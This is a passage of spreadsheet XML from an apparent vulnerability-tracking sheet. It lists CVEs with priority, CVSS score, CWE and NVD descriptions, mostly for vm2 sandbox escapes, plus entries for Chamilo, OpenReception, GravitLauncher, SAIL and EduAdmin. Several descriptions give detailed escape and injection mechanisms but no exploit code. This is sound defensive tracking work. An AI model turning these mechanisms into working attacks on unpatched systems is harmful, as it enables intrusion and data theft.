          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.7 contains a remote code execution vulnerability when require.external is enabled without an explicit require.root that excludes node_modules. Sandboxed code can require vm2's own package, instantiate an unrestricted NodeVM instance, and execute arbitrary host OS commands via child_process.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92946</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92947</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.7 exposes Node's shared Buffer pool to sandboxed code, allowing disclosure of host memory used by Buffer.from, Buffer.concat, and related allocations. Sandboxed code can read and write to host-realm buffers by acquiring ArrayBuffers from small allocations, leading to sensitive data exposure and potential denial-of-service.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92947</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92953</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>10</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2026-09-17</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>vm2 versions from 3.11.0 before 3.11.8 fail to protect host TypedArray and ArrayBuffer prototypes from sandbox mutation. Attackers can use prototype-walking primitives to reach and modify host Uint8Array.prototype, %TypedArray%.prototype, and ArrayBuffer.prototype, causing host-created typed arrays to observe attacker-controlled properties after VM.run() returns.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92953</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92955</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.8 contains a sandbox escape vulnerability in NodeVM that allows attackers to access the host __proto__ getter/setter through console._stdout and console._stderr. Attackers can overwrite EventEmitter.prototype.emit and trigger process events to execute code with process context, bypassing code generation restrictions.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92955</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92956</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>vm2 versions 3.10.1 through 3.11.6 contain a sandbox escape reachable from a default `new VM()` sandbox when running on Node.js 26. WebAssembly.compileStreaming and WebAssembly.instantiateStreaming can produce a raw host-realm Promise that rejects with a host-realm error object; by controlling Symbol.species via Promise.prototype.finally, sandbox code receives that raw host error, walks from the host error constructor to the host Function constructor, and recovers the real host `process` object, gaining host Node.js capabilities (e.g. access to host modules such as fs) in the context of the process running the sandbox. No NodeVM, require permission, host object injection, or otherwise unsafe configuration is required. This is a bypass of the fix for GHSA-6j2x-vhqr-qr7q, which removed the JSPI entry points WebAssembly.promising and WebAssembly.Suspending. The issue is fixed in 3.11.7.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92956</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92960</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.6 fails to restrict access to os and dns builtins under the builtin: ['*'] configuration, allowing sandbox code to read host process identity and network topology. Attackers can invoke dns.setServers() to hijack the host process DNS resolver globally, redirecting all subsequent host DNS queries through an attacker-controlled resolver.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92960</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85885</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in M365 Copilot allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85885</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92938</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>vm2 versions 3.11.3 through 3.11.6 expose Node.js's host node:sqlite module to code running in NodeVM when that builtin is permitted, either explicitly or through builtin: ['*']. The module is wrapped with vm.readonly(), which prevents property assignment but leaves host-authority callables reachable; in addition, the resolver treats any request starting with 'node:' as a core-module request and the runtime strips only one 'node:' prefix, so a sandbox request for 'node:node:sqlite' resolves to the configured node:sqlite entry. Sandboxed code can therefore create an in-memory DatabaseSync with extension loading enabled and call DatabaseSync.loadExtension() on a native library bundled in the untrusted plugin package (path derived from __dirname). SQLite loads the library into the Node.js host process and invokes its native entry point, giving the sandboxed plugin arbitrary native code execution outside the sandbox with the host process's privileges. The issue is fixed in vm2 3.11.7.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92938</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92948</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>vm2 versions &gt;= 3.9.6 and &lt;= 3.11.6 are affected by a NodeVM builtin allowlist bypass that permits a sandbox escape on Node.js 24 and newer when the embedder explicitly allows the node:test builtin (e.g. require: { builtin: ['node:test'] }). On Node.js 24+, module.builtinModules exposes the scheme-only key node:test, which is not covered by vm2's family-based DANGEROUS_BUILTINS protection, so it is stored in the generic host-passthrough loader. Because requireImpl() in lib/setup-node-sandbox.js strips a single 'node:' prefix before the builtin lookup, sandbox code calling require('node:node:test') resolves to the stored node:test key and receives a readonly proxy to the host module. Calls to node:test.run() are forwarded to the host implementation, which spawns a separate Node process for process-isolated test execution and passes through attacker-controlled execArgv values; supplying --eval=&lt;JavaScript&gt; therefore executes arbitrary JavaScript in an unrestricted host Node process outside the NodeVM sandbox. Fixed in vm2 3.11.7.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92948</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45140</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr">
        <is>
          <t>composer:chamilo/chamilo-lms</t>
        </is>
      </c>
      <c r="M22" s="5" t="inlineStr">
        <is>
          <t>2.0.1</t>
        </is>
      </c>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-219, CWE-22, CWE-434, CWE-94</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>Chamilo LMS is an open-source learning management system. Prior to 2.0.1, Chamilo LMS allows an unauthenticated remote attacker to execute arbitrary code on the server. The authoritative advisory does not identify the affected endpoint, component, input, or exploitation mechanism. This issue is fixed in version 2.0.1.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45140</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54460</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to 1.1.1, POST /api/auth/passkeys accepts a request-body userId and attacker-supplied passkey without an authenticated session, does not call WebAuthnService.verifyRegistration, and does not bind enrollment to locals.user.id. An unauthenticated attacker who knows the public tenant ID and the target staff email can use the public booking bootstrap and GET /api/tenants/[id]/appointments/staff-public-keys to obtain candidate userId values. The attacker first causes UserService.addAdditionalPasskey to store a controlled public key for a candidate userId, then attempts login with the target email; the login check compares verificationResult.userId with the email-resolved account and reveals whether the injected credential belongs to that target. Repeating this injection-before-login sequence identifies the matching userId, and the normal login endpoint accepts the attacker's assertion for the stored key and creates a STAFF session. The session can expose tenant data and reveal TENANT_ADMIN identifiers for further takeover; GLOBAL_ADMIN accounts are not reachable through this tenant-scoped path. A hijacked TENANT_ADMIN can modify or delete tenant resources and key shares, potentially making appointment data permanently undecryptable and taking booking services offline. This issue is fixed in version 1.1.1.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54460</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54617</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-22, CWE-522</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>GravitLauncher is an open-source Minecraft launcher based on sashok724's v3. Prior to 5.7.12, an unauthenticated remote actor can send a raw HTTP request target without a leading slash to the default LaunchServer file server on port 9274. FileServerHandler.channelRead0 in components/launchserver/src/main/java/pro/gravit/launchserver/socket/handlers/fileserver/FileServerHandler.java strips the first request-target character and resolves the remaining path against updatesDir without re-normalizing and verifying containment. This leaves parent-directory components in a no-leading-slash request and allows reading any file accessible to the LaunchServer process, including .keys/ecdsa_id, .keys/legacySalt, and LaunchServer.json. Disclosure of those files can expose signing keys, refresh-token material, and database credentials, enabling forged administrative access tokens and full authentication bypass. A normalizing L7 proxy may block the primary request form, but direct exposure and L4/TCP proxies remain affected, and netty.fileServerEnabled is enabled by default. This issue is fixed in 5.7.12.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54617</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54626</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>SAIL is a cross-platform library for loading and saving images with support for animation, metadata, and ICC profiles. In 0.9.10 and earlier, the TGA_INDEXED_RLE path selected by image_type == 9 allocates an image buffer using the one-byte-per-pixel SAIL_PIXEL_FORMAT_BPP8_INDEXED format returned by tga_private_sail_pixel_format() in src/sail-codecs/tga/helpers.c, while sail_codec_load_frame_v8_tga() in src/sail-codecs/tga/tga.c derives a two-to-four-byte pixel_size from an attacker-controlled header bpp value from 9 through 32. Loading a crafted color-mapped run-length-encoded TGA through sail_load_from_file() or sail_load_from_memory() therefore writes attacker-controlled bytes beyond the heap pixel buffer. The pixel-count clamp added for CVE-2026-40494 does not constrain the per-pixel write width, so this issue is an incomplete fix of that vulnerability and can cause heap corruption, a reliable crash, or potential code execution. This issue is fixed in version 1.0.0.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54626</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54627</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>SAIL is a cross-platform library for loading and saving images with support for animation, metadata, and ICC profiles. In 0.9.10 and earlier, psd_private_sail_pixel_format() in src/sail-codecs/psd/helpers.c resolves a one-channel PSD in Bitmap color mode to SAIL_PIXEL_FORMAT_BPP1_INDEXED without requiring the file depth to be one, so the pixel buffer uses one-bit rows while sail_codec_load_frame_v8_psd() in src/sail-codecs/psd/psd.c accepts depth == 8 and writes one attacker-controlled byte per pixel. Loading a crafted PSD through sail_load_from_file() or sail_load_from_memory() therefore writes beyond each heap row, causing memory corruption, a reliable crash, or potential code execution. This mode/depth mismatch is distinct from GHSA-rcqx-gc76-r9mv and GHSA-wcj8-hxxf-pq2c. This issue is fixed in version 1.0.0.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54627</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62101</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Authentication in EduAdmin Booking &lt;= 5.4.2 versions.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62101</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
